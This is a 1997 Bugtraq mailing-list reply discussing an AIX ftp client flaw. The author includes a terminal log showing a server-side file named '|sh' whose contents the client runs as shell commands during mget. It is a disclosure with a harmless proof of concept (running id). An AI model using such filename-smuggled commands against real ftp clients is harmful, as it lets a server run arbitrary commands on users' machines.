Date: Mon, 3 Nov 1997 10:03:52 -0700
From: af@C4C.COM
To: BUGTRAQ@NETSPACE.ORG
Subject: Re: IBM-ERS Security Vulnerability Alert: The AIX ftp client              interprets server provided filenames

> ers@VNET.IBM.COM wrote:
> > VULNERABILITY:    The AIX ftp client interprets server provided
> > filenames
> > I.  Description
> > The ftp client can be tricked into running arbitrary commands supplied
> > by the
> > remote server.  When the remote file begins with a pipe symbol, the
> > ftp client
> > will process the contents of the remote file as a shell script.
>
> On two machines running AIX 3.2.5 I've tested it, but instead of
> executing the remote file, it searches for a local file with the same
> name as the remote file and executes it with normal user priviledges
> instead of root privilegdes.

Yes, but try "|sh" instead.  I've included a log of what happens.
> BTW, I believe that this also happens on HP-UX 9.05

It works on our Linux slackware as well.  I suspect most ftp
clients are susceptible to this "problem."

$ id
uid0(guest) gid0(usr)
$ pwd
/tmp/ftp-test
$ echo "id > /tmp/OUT" > "|sh"
$ ls -la
total 24
drwxr-xr-x   2 guest    usr          512 Nov  3 09:45 .
drwxrwxrwt   6 bin      bin         1024 Nov  3 09:44 ..
-rw-r--r--   1 guest    usr           14 Nov  3 09:45 |sh
$ ftp localhost
Connected to localhost.
....snip....
230 User guest logged in.
ftp> cd /tmp/ftp-test
ftp> ls -l
total 24
-rw-r--r--   1 guest    usr           14 Nov  3 09:45 |sh
ftp> mget *
mget |sh? y
150 Opening data connection for |sh (14 bytes)
6c5
.
15 bytes received in 0.2187 seconds (0.06699 Kbytes/s)
local: |sh remote: |sh
ftp> quit
$ ls -l /tmp/OUT
-rw-r--r--   1 guest    usr           28 Nov  3 09:45 /tmp/OUT
$ cat /tmp/OUT
uid0(guest) gid0(usr)
$

I also wonder about IBM's answer:

SOLUTION:         Remove the setuid bit from the "ftp" command.

On our 4.2.1, ftp will not run if it is not suid.
Didn't somebody test this?

Andrew Green
af@c4c.com